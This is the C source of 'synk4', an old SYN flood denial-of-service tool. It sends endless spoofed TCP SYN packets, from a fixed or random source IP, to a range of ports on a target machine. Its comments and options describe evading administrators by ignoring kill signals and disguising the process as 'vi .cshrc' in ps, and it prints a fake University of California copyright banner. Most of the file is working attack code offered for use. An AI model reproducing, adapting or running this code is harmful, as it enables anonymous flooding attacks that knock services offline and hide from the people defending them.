/* Syn Flooder by Zakath * TCP Functions by trurl_ (thanks man). * Some more code by Zakath. * Speed/Misc Tweaks/Enhancments -- ultima * Nice Interface -- ultima * Random IP Spoofing Mode -- ultima * How To Use: * Usage is simple. srcaddr is the IP the packets will be spoofed from. * dstaddr is the target machine you are sending the packets to. * low and high ports are the ports you want to send the packets to. * Random IP Spoofing Mode: Instead of typing in a source address, * just use '0'. This will engage the Random IP Spoofing mode, and * the source address will be a random IP instead of a fixed ip. * Released: [4.29.97] * To compile: cc -o synk4 synk4.c * */ #include #include #include #include #include #include #include #include /* These can be handy if you want to run the flooder while the admin is on * this way, it makes it MUCH harder for him to kill your flooder */ /* Ignores all signals except Segfault */ // #define HEALTHY /* Ignores Segfault */ // #define NOSEGV /* Changes what shows up in ps -aux to whatever this is defined to */ // #define HIDDEN "vi .cshrc" #define SEQ 0x28376839 #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min)) unsigned long send_seq, ack_seq, srcport; char flood = 0; int sock, ssock, curc, cnt; /* Check Sum */ unsigned short ip_sum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } void sig_exit(int crap) { #ifndef HEALTHY printf("Signal Caught. Exiting Cleanly.\n"); exit(crap); #endif } void sig_segv(int crap) { #ifndef NOSEGV printf("Segmentation Violation Caught. Exiting Cleanly.\n"); exit(crap); #endif } unsigned long getaddr(char *name) { struct hostent *hep; hep = gethostbyname(name); if (!hep) { fprintf(stderr, "Unknown host %s\n", name); exit(1); } return *(unsigned long *) hep->h_addr; } void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data, int dlen) { char buf[65536]; struct { /* rfc 793 tcp pseudo-header */ unsigned long saddr, daddr; char mbz; char ptcl; unsigned short tcpl; } ph; struct sockaddr_in sin; /* how necessary is this, given that the destination address is already in the ip header? */ ph.saddr = ih->saddr; ph.daddr = ih->daddr; ph.mbz = 0; ph.ptcl = IPPROTO_TCP; ph.tcpl = htons(sizeof(*th) + dlen); memcpy(buf, &ph, sizeof(ph)); memcpy(buf + sizeof(ph), th, sizeof(*th)); memcpy(buf + sizeof(ph) + sizeof(*th), data, dlen); memset(buf + sizeof(ph) + sizeof(*th) + dlen, 0, 4); th->check = ip_sum(buf, (sizeof(ph) + sizeof(*th) + dlen + 1) & ~1); memcpy(buf, ih, 4 * ih->ihl); memcpy(buf + 4 * ih->ihl, th, sizeof(*th)); memcpy(buf + 4 * ih->ihl + sizeof(*th), data, dlen); memset(buf + 4 * ih->ihl + sizeof(*th) + dlen, 0, 4); ih->check = ip_sum(buf, (4 * ih->ihl + sizeof(*th) + dlen + 1) & ~1); memcpy(buf, ih, 4 * ih->ihl); sin.sin_family = AF_INET; sin.sin_port = th->dest; sin.sin_addr.s_addr = ih->daddr; if (sendto (ssock, buf, 4 * ih->ihl + sizeof(*th) + dlen, 0, &sin, sizeof(sin)) < 0) { printf("Error sending syn packet.\n"); perror(""); exit(1); } } unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip, unsigned short port) { int i, s; struct iphdr ih; struct tcphdr th; struct sockaddr_in sin; int sinsize; unsigned short myport = 6969; char buf[1024]; struct timeval tv; ih.version = 4; ih.ihl = 5; ih.tos = 0; /* XXX is this normal? */ ih.tot_len = sizeof(ih) + sizeof(th); ih.id = htons(random()); ih.frag_off = 0; ih.ttl = 30; ih.protocol = IPPROTO_TCP; ih.check = 0; ih.saddr = my_ip; ih.daddr = their_ip; th.source = htons(srcport); th.dest = htons(port); th.seq = htonl(SEQ); th.doff = sizeof(th) / 4; th.ack_seq = 0; th.res1 = 0; th.fin = 0; th.syn = 1; th.rst = 0; th.psh = 0; th.ack = 0; th.urg = 0; // th.res2=0; th.window = htons(65535); th.check = 0; th.urg_ptr = 0; gettimeofday(&tv, 0); send_tcp_segment(&ih, &th, "", 0); send_seq = SEQ + 1 + strlen(buf); } void upsc() { int i; char schar[5] = "|/-\\"; printf("[%c] %d", schar[cnt], curc); cnt++; cnt %= 4; for (i = 0; i < 26; i++) { i++; curc++; } } void init_signals() { // Every Signal known to man. If one gives you an error, comment it out! signal(SIGHUP, sig_exit); signal(SIGINT, sig_exit); signal(SIGQUIT, sig_exit); signal(SIGILL, sig_exit); signal(SIGTRAP, sig_exit); signal(SIGIOT, sig_exit); signal(SIGBUS, sig_exit); signal(SIGFPE, sig_exit); signal(SIGKILL, sig_exit); signal(SIGUSR1, sig_exit); signal(SIGSEGV, sig_segv); signal(SIGUSR2, sig_exit); signal(SIGPIPE, sig_exit); signal(SIGALRM, sig_exit); signal(SIGTERM, sig_exit); signal(SIGCHLD, sig_exit); signal(SIGCONT, sig_exit); signal(SIGSTOP, sig_exit); signal(SIGTSTP, sig_exit); signal(SIGTTIN, sig_exit); signal(SIGTTOU, sig_exit); signal(SIGURG, sig_exit); signal(SIGXCPU, sig_exit); signal(SIGXFSZ, sig_exit); signal(SIGVTALRM, sig_exit); signal(SIGPROF, sig_exit); signal(SIGWINCH, sig_exit); signal(SIGIO, sig_exit); signal(SIGPWR, sig_exit); } main(int argc, char **argv) { int i, x, max, floodloop, diff, urip, a, b, c, d; unsigned long them, me_fake; unsigned lowport, highport; char buf[1024], *junk; init_signals(); #ifdef HIDDEN for (i = argc - 1; i >= 0; i--) /* Some people like bzero...i prefer memset :) */ memset(argv[i], 0, strlen(argv[i])); strcpy(argv[0], HIDDEN); #endif if (argc < 5) { printf("Usage: %s srcaddr dstaddr low high\n", argv[0]); printf(" If srcaddr is 0, random addresses will be used\n\n\n"); exit(1); } if (atoi(argv[1]) == 0) urip = 1; else me_fake = getaddr(argv[1]); them = getaddr(argv[2]); lowport = atoi(argv[3]); highport = atoi(argv[4]); srandom(time(0)); ssock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (ssock < 0) { perror("socket (raw)"); exit(1); } sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (sock < 0) { perror("socket"); exit(1); } junk = (char *) malloc(1024); max = 1500; i = 1; diff = (highport - lowport); if (diff > -1) { printf ("\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991 The Regents of the University\n of California. All Rights Reserved."); for (i = 1; i > 0; i++) { srandom((time(0) + i)); srcport = getrandom(1, max) + 1000; for (x = lowport; x <= highport; x++) { if (urip == 1) { a = getrandom(0, 255); b = getrandom(0, 255); c = getrandom(0, 255); d = getrandom(0, 255); sprintf(junk, "%i.%i.%i.%i", a, b, c, d); me_fake = getaddr(junk); } spoof_open( /*0xe1e26d0a */ me_fake, them, x); /* A fair delay. Good for a 28.8 connection */ // usleep(300); if (!(floodloop = (floodloop + 1) % (diff + 1))) { upsc(); fflush(stdout); } } } } else { printf("High port must be greater than Low port.\n"); exit(1); } }